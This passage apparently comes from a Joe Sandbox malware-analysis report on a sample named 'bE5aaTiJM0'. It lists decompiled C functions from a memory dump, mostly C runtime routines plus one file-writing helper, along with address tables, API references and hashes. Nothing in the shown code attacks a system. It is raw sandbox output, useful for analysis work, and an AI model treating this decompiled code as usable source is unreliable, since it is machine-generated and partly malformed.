						_t89 =  >=  ? _a28 :  &_a28;
						_push( >=  ? _a28 :  &_a28);
						_push(0);
						_t82 = E00421B3B();
						_t129 = _t82;
						_t139 = _t139 + 8;
					} while (_t129 != 0);
					goto L39;
				}
				_t132 = _t82;
				if(_t82 == _t112) {
					L9:
					_t82 = L00422587(_t82);
					_t139 = _t139 + 4;
					goto L10;
				} else {
					do {
						if( *((intOrPtr*)(_t132 + 0x14)) >= 0x10) {
							L00422587( *_t132);
							_t139 = _t139 + 4;
						}
						 *((intOrPtr*)(_t132 + 0x14)) = 0xf;
						 *((intOrPtr*)(_t132 + 0x10)) = 0;
						 *_t132 = 0;
						_t132 = _t132 + 0x18;
					} while (_t132 != _t112);
					_t82 = _v20;
					goto L9;
				}
			}

0x0040ecb3
0x0040ecb5
0x0040ecc0
0x0040ecc1
0x0040ecc8
0x0040eccd
0x0040ecce
0x0040ecd0
0x0040ecd7
0x0040ecd9
0x0040ecdb
0x0040ece3
0x0040ece5
0x0040ece7
0x0040ece9
0x0040ecec
0x0040ecf3
0x0040ecf6
0x0040ecf6
0x0040ecfd
0x0040ed03
0x0040ed44
0x0040ed48
0x0040eefc
0x0040ef00
0x0040ef05
0x0040ef0a
0x0040ef0a
0x0040ef11
0x0040ef18
0x0040ef1f
0x0040ef23
0x0040ef28
0x0040ef2d
0x0040ef35
0x0040ef40
0x0040ef40
0x0040ed58
0x0040ed60
0x0040ed61
0x0040ed65
0x0040ed66
0x0040ed6b
0x0040ed6d
0x0040ed72
0x00000000
0x00000000
0x0040ed80
0x0040ed83
0x0040ed8a
0x0040ed91
0x0040ed95
0x0040ed9b
0x0040ed9d
0x0040ed9d
0x0040eda0
0x0040eda0
0x0040eda2
0x0040eda3
0x0040eda7
0x0040eda9
0x0040eda9
0x0040edab
0x0040edae
0x0040edb3
0x0040edba
0x0040edbf
0x0040ee58
0x0040ee5b
0x0040ee60
0x0040ee60
0x0040ee65
0x0040ee6a
0x0040ee6c
0x0040ee73
0x0040ee7a
0x0040ee81
0x0040ee9c
0x0040ee9e
0x0040ee83
0x0040ee86
0x0040ee87
0x0040ee8f
0x0040ee94
0x0040ee94
0x0040ee87
0x0040eea8
0x0040eeae
0x0040eeb1
0x0040eeb8
0x0040eebf
0x0040eebf
0x00000000
0x0040ee6a
0x0040edc5
0x0040edc7
0x0040edcc
0x00000000
0x00000000
0x0040edd2
0x0040ede3
0x0040ede8
0x0040eded
0x0040eded
0x0040edf7
0x0040edfa
0x0040edff
0x0040ee05
0x0040ee0c
0x0040ee13
0x0040ee1a
0x0040ee31
0x0040ee33
0x0040ee1c
0x0040ee1f
0x0040ee20
0x0040ee25
0x0040ee2a
0x0040ee2a
0x0040ee20
0x0040ee3c
0x0040ee42
0x0040ee45
0x0040ee4c
0x0040ee53
0x0040ee53
0x00000000
0x0040edff
0x0040ed97
0x00000000
0x0040eec3
0x0040eec3
0x0040eec7
0x0040eecf
0x0040eed4
0x0040eed9
0x0040eed9
0x0040eee3
0x0040eee7
0x0040eee8
0x0040eeea
0x0040eeef
0x0040eef1
0x0040eef4
0x00000000
0x0040ed80
0x0040ed05
0x0040ed09
0x0040ed3b
0x0040ed3c
0x0040ed41
0x00000000
0x0040ed0b
0x0040ed10
0x0040ed14
0x0040ed18
0x0040ed1d
0x0040ed1d
0x0040ed20
0x0040ed27
0x0040ed2e
0x0040ed31
0x0040ed34
0x0040ed38
0x00000000
0x0040ed38

APIs

_strtok.LIBCMT ref: 0040ED66
_memmove.LIBCMT ref: 0040EE25

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: _memmove_strtok
String ID:
API String ID: 3446180046-0
Opcode ID: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
Opcode Fuzzy Hash: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00422130 Relevance: 6.2, APIs: 4, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E00422130(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				_t124 = _t99;
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E0042B420(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(__eflags == 0) {
							goto L3;
						} else {
							__eflags = _t97 - (_t74 | 0xffffffff) / _a12;
							if(__eflags > 0) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E0042B2F2(_t98, _t119, _t119);
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(__eflags != 0) {
													E0042B420(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E00425208(__eflags))) = 0x22;
												L4:
												E004242D2();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_v8 = _t110 + 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E0042816B(_t119));
											_t88 = E0042B5C4();
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E00429544(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										_t120 = _t120 + 0x10;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E00425208(_t124))) = 0x16;
				goto L4;
			}

0x0042213a
0x0042213d
0x00422143
0x00422146
0x00422149
0x00422166
0x00000000
0x00422166
0x0042214b
0x00422150
0x00000000
0x00000000
0x00422152
0x00422154
0x0042216f
0x00422172
0x00422174
0x00422182
0x00422182
0x00422186
0x0042218e
0x00422193
0x00422193
0x00422196
0x00422198
0x00000000
0x0042219a
0x004221a2
0x004221a4
0x00000000
0x00000000
0x004221a6
0x004221a9
0x004221ac
0x004221b3
0x004221b5
0x004221bc
0x004221b7
0x004221b7
0x004221b7
0x004221c1
0x004221c4
0x004221c6
0x004222af
0x00000000
0x004221cc
0x004221cc
0x004221cc
0x004221d3
0x00422214
0x00422214
0x00422216
0x00422281
0x00422287
0x0042228a
0x004222e1
0x00000000
0x004222e7
0x0042228c
0x0042228f
0x00422291
0x004222b7
0x004222b7
0x004222bb
0x004222c5
0x004222ca
0x004222d2
0x00422161
0x00422161
0x00000000
0x00422161
0x00422293
0x00422296
0x00422299
0x0042229a
0x0042229d
0x0042229d
0x0042229e
0x004222a1
0x004222a4
0x00000000
0x004222a4
0x00422218
0x0042221a
0x0042223e
0x00422243
0x00422249
0x0042224b
0x0042224b
0x0042221c
0x0042221e
0x00422224
0x00422236
0x00422236
0x00422236
0x00422238
0x00422226
0x0042222b
0x0042222d
0x0042222d
0x0042223a
0x0042223a
0x0042224d
0x00422250
0x00000000
0x00422252
0x00422252
0x00422253
0x0042225d
0x0042225e
0x00422263
0x00422266
0x00422268
0x004222ef
0x00000000
0x004222ef
0x0042226e
0x00422271
0x004222dd
0x004222dd
0x004222dd
0x004222dd
0x00000000
0x004222dd
0x00422273
0x00422273
0x00422275
0x00422275
0x00422278
0x0042227b
0x00000000
0x0042227b
0x00422250
0x004221d5
0x004221d8
0x004221db
0x004221dd
0x00000000
0x00000000
0x004221df
0x00000000
0x00000000
0x004221e5
0x004221e7
0x004221e9
0x004221eb
0x004221eb
0x004221ee
0x004221f1
0x004221f3
0x00000000
0x004221f9
0x00422200
0x00422205
0x00422208
0x0042220b
0x0042220e
0x00422210
0x00000000
0x00422210
0x004222a7
0x004222a7
0x004222a7
0x00000000
0x004221cc
0x004221c6
0x00422198
0x0042217b
0x0042217e
0x00422180
0x00000000
0x00000000
0x00000000
0x00422180
0x00422156
0x0042215b
0x00000000

APIs

_memset.LIBCMT ref: 0042218E
__read_nolock.LIBCMT ref: 0042225E
__filbuf.LIBCMT ref: 00422281
_memset.LIBCMT ref: 004222C5

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock
String ID:
API String ID: 2974526305-0
Opcode ID: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
Opcode Fuzzy Hash: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0043C677 Relevance: 6.1, APIs: 4, Instructions: 97
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0043C677(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E0042019C( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E00422BCC( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E00425208(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

0x0043c67f
0x0043c684
0x0043c69e
0x00000000
0x0043c69e
0x0043c686
0x0043c68b
0x00000000
0x00000000
0x0043c690
0x0043c6ad
0x0043c6b2
0x0043c6b5
0x0043c6bc
0x0043c6db
0x0043c6e2
0x0043c6e4
0x0043c728
0x0043c737
0x0043c745
0x0043c747
0x0043c757
0x0043c757
0x0043c75b
0x0043c75d
0x0043c760
0x0043c760
0x0043c760
0x0043c760
0x00000000
0x0043c766
0x0043c749
0x0043c749
0x0043c74e
0x0043c74e
0x0043c751
0x00000000
0x0043c751
0x0043c6e6
0x0043c6e9
0x0043c6ed
0x0043c716
0x0043c716
0x0043c719
0x0043c719
0x00000000
0x00000000
0x0043c71b
0x0043c71f
0x00000000
0x00000000
0x0043c721
0x0043c721
0x00000000
0x0043c721
0x0043c6ef
0x0043c6f2
0x00000000
0x00000000
0x0043c6f6
0x0043c709
0x0043c70f
0x0043c712
0x0043c714
0x00000000
0x00000000
0x00000000
0x0043c714
0x0043c6be
0x0043c6c1
0x0043c6c3
0x0043c6c8
0x0043c6c8
0x0043c6cd
0x00000000
0x0043c6cd
0x0043c692
0x0043c697
0x0043c69b
0x0043c69b
0x00000000

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
__isleadbyte_l.LIBCMT ref: 0043C6DB
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040F0E0 Relevance: 6.1, APIs: 4, Instructions: 86
filestringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040F0E0(intOrPtr* __ecx, char _a4, intOrPtr _a24) {
				struct _OVERLAPPED* _v8;
				intOrPtr _v16;
				char _v17;
				long _v24;
				intOrPtr _v28;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t23;
				intOrPtr _t25;
				void* _t31;
				intOrPtr* _t35;
				signed int _t37;
				short* _t40;
				void* _t43;
				intOrPtr* _t46;
				CHAR* _t49;
				intOrPtr _t50;
				void* _t51;
				short* _t53;

				_push(0xffffffff);
				_push(0x4caa48);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t50;
				_t51 = _t50 - 0x20;
				_push(_t31);
				_t46 = __ecx;
				_v8 = 0;
				_t22 =  >=  ? _a4 :  &_a4;
				_t23 = CreateFileW( >=  ? _a4 :  &_a4, 0x40000000, 2, 0, 2, 0x80, 0);
				_t43 = _t23;
				if(_t43 == 0xffffffff) {
					L8:
					if(_a24 >= 8) {
						_t23 = L00422587(_a4);
					}
					 *[fs:0x0] = _v16;
					return _t23;
				}
				_t53 = _t51 - 0x18;
				_v17 = 0;
				_t40 = _t53;
				 *((intOrPtr*)(_t40 + 0x14)) = 7;
				 *(_t40 + 0x10) = 0;
				 *_t40 = 0;
				if( *_t46 != 0) {
					_t35 = _t46;
					_t31 = _t35 + 2;
					do {
						_t25 =  *_t35;
						_t35 = _t35 + 2;
					} while (_t25 != 0);
					_t37 = _t35 - _t31 >> 1;
					L6:
					_push(_t37);
					E00415C10(_t31, _t40, _t43, _t46, _t46);
					E00412840( &_v48, _v17);
					_t51 = _t53 + 0x18;
					_t49 =  >=  ? _v48 :  &_v48;
					WriteFile(_t43, _t49, lstrlenA(_t49),  &_v24, 0);
					_t23 = CloseHandle(_t43);
					if(_v28 >= 0x10) {
						_t23 = L00422587(_v48);
						_t51 = _t51 + 4;
					}
					goto L8;
				}
				_t37 = 0;
				goto L6;
			}

0x0040f0e3
0x0040f0e5
0x0040f0f0
0x0040f0f1
0x0040f0f8
0x0040f0fb
0x0040f0fe
0x0040f10b
0x0040f11b
0x0040f125
0x0040f12b
0x0040f130
0x0040f1bf
0x0040f1c3
0x0040f1c8
0x0040f1cd
0x0040f1d5
0x0040f1e0
0x0040f1e0
0x0040f136
0x0040f139
0x0040f13d
0x0040f141
0x0040f148
0x0040f14f
0x0040f155
0x0040f15b
0x0040f15d
0x0040f160
0x0040f160
0x0040f163
0x0040f166
0x0040f16d
0x0040f16f
0x0040f16f
0x0040f173
0x0040f17e
0x0040f183
0x0040f190
0x0040f1a1
0x0040f1a8
0x0040f1b2
0x0040f1b7
0x0040f1bc
0x0040f1bc
0x00000000
0x0040f1b2
0x0040f157
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
CloseHandle.KERNEL32(00000000), ref: 0040F1A8

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWritelstrlen
String ID:
API String ID: 1421093161-0
Opcode ID: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
Opcode Fuzzy Hash: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004409B9 Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004409B9(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00440F28(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00440A5D(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E004411DC(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E004410FD(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x004409bc
0x004409c2
0x00440a35
0x00000000
0x004409c9
0x004409c9
0x004409cc
0x004409e7
0x004409ea
0x00440a0a
0x00440a1c
0x004409ec
0x004409ec
0x004409ef
0x00000000
0x004409f1
0x00440a03
0x00440a03
0x004409ef
0x00440a3a
0x00440a3e
0x004409ce
0x004409e6
0x004409e6
0x004409cc

APIs

__cftof_l.LIBCMT ref: 004409DD

Part of subcall function 004410FD: __fltout2.LIBCMT ref: 00441126

__cftog_l.LIBCMT ref: 00440A03
__cftoe_l.LIBCMT ref: 00440A35

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85

Uniqueness

Uniqueness Score: -1.00%

Function 004127A0 Relevance: 6.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004127A0(WCHAR* __ecx, void* __edx) {
				int _v8;
				void* __ebx;
				void* __edi;
				short* _t12;
				void* _t17;
				char* _t18;
				int _t21;

				_t16 = __edx;
				_push(__ecx);
				_t12 = __ecx;
				_push(_t17);
				_t5 =  !=  ? 0xfde9 : 0;
				_v8 =  !=  ? 0xfde9 : 0;
				_t2 = lstrlenW(__ecx) + 1; // 0x1
				_t21 = _t2;
				_t18 = E00420C62(_t12, _t16, _t17, _t21);
				E0042B420(_t18, 0, _t21);
				WideCharToMultiByte(_v8, 0, _t12, 0xffffffff, _t18, _t21, 0, 0);
				return _t18;
			}

0x004127a0
0x004127a3
0x004127a7
0x004127b1
0x004127b2
0x004127b6
0x004127bf
0x004127bf
0x004127c9
0x004127ce
0x004127e4
0x004127f2

APIs

lstrlenW.KERNEL32 ref: 004127B9
_malloc.LIBCMT ref: 004127C3

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(006D0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_memset.LIBCMT ref: 004127CE
WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
String ID:
API String ID: 2824100046-0
Opcode ID: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
Opcode Fuzzy Hash: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9

Uniqueness

Uniqueness Score: -1.00%

Function 00414920 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00414920(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8, intOrPtr* _a12, signed int _a16, intOrPtr _a20) {
				intOrPtr _v8;
				signed int _v12;
				signed int _t128;
				intOrPtr _t134;
				intOrPtr* _t137;
				intOrPtr _t140;
				signed int _t144;
				intOrPtr* _t146;
				intOrPtr _t149;
				intOrPtr _t153;
				intOrPtr _t158;
				intOrPtr _t163;
				intOrPtr _t164;
				intOrPtr* _t165;
				intOrPtr _t167;
				intOrPtr _t171;
				intOrPtr _t191;
				signed int _t194;
				intOrPtr* _t195;
				intOrPtr _t196;
				intOrPtr* _t200;
				signed int _t203;
				intOrPtr _t204;
				intOrPtr* _t205;
				intOrPtr _t207;
				intOrPtr* _t208;
				intOrPtr* _t210;
				signed int _t212;
				intOrPtr* _t213;
				intOrPtr* _t217;
				intOrPtr* _t221;
				intOrPtr* _t223;
				intOrPtr* _t224;
				signed int _t226;
				intOrPtr* _t231;
				void* _t232;
				intOrPtr* _t235;
				intOrPtr* _t237;
				intOrPtr* _t240;
				intOrPtr* _t241;
				signed int _t244;
				signed int _t246;
				signed int _t247;
				intOrPtr* _t251;
				void* _t258;
				void* _t259;

				_t200 = __ecx;
				_t259 = _t258 - 8;
				_t251 = __ecx;
				_t244 = _a4;
				_t128 =  *(__ecx + 0x10);
				if(_t128 < _t244) {
					L86:
					_push("invalid string position");
					E0044F26C(__eflags);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return  *((intOrPtr*)(_t200 + 0x10));
				} else {
					_t226 = _a16;
					_t200 =  *((intOrPtr*)(_a12 + 0x10));
					if(_t200 < _t226) {
						goto L86;
					} else {
						_v8 = _t128 - _t244;
						_t191 = _a8;
						_t192 =  <  ? _v8 : _t191;
						_v12 = _t200 - _t226;
						_a8 =  <  ? _v8 : _t191;
						_t200 =  <  ? _v12 : _a20;
						_t194 = _t128 - _a8;
						_v12 = _t194;
						_t195 = _a12;
						_a20 = _t200;
						if((_t128 | 0xffffffff) - _t200 <= _t194) {
							_push("string too long");
							E0044F23E(__eflags);
							goto L86;
						} else {
							_t134 = _a8;
							_t246 = _v12 + _t200;
							_v8 = _v8 - _t134;
							_v12 = _t246;
							_t247 = _a4;
							if( *(__ecx + 0x10) < _t246) {
